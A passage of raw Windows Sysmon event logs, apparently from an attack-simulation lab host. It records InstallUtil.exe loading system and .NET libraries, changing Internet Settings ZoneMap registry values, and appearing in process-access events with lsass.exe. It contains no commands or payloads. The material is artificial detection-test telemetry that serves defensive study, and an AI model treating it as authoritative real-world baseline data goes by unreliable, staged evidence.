19:24:03.683{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057679165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.683{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057679164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.683{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057679163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.683{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057679162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.683{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057679161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057679160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057679159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057679158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057679157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057679156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057679155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057679154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057679153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057679152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057679151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-886B-6164-0B00-00000000F101}6488692C:\Windows\system32\lsass.exe{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057679150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-886B-6164-0B00-00000000F101}6488692C:\Windows\system32\lsass.exe{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057679149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057679148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057679147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057679146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057679145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057679144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057679143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.667{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057679142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.652{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057679141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.652{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057679140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.652{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057679139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.652{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057679138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.652{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057679137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x800000000000000057679136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 13241300x800000000000000057679135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:24:03.636{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7fa-0xda61e9f8) 734700x800000000000000057679133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057679132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057679131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057679130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057679129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057679128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057679127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057679126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057679125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057679124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057679123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057679122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057679121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057679120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057679119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.636{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057679118Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:24:03.620{8B6011A9-BF53-618E-0900-05000000F101}7268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 